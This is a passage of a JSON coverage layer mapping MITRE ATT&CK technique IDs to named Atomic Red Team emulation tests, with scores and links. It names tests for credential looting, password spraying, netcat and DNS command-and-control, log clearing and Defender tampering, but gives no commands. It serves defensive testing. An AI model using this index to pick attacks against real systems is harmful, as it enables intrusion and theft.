script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence 
(HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload 
Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View 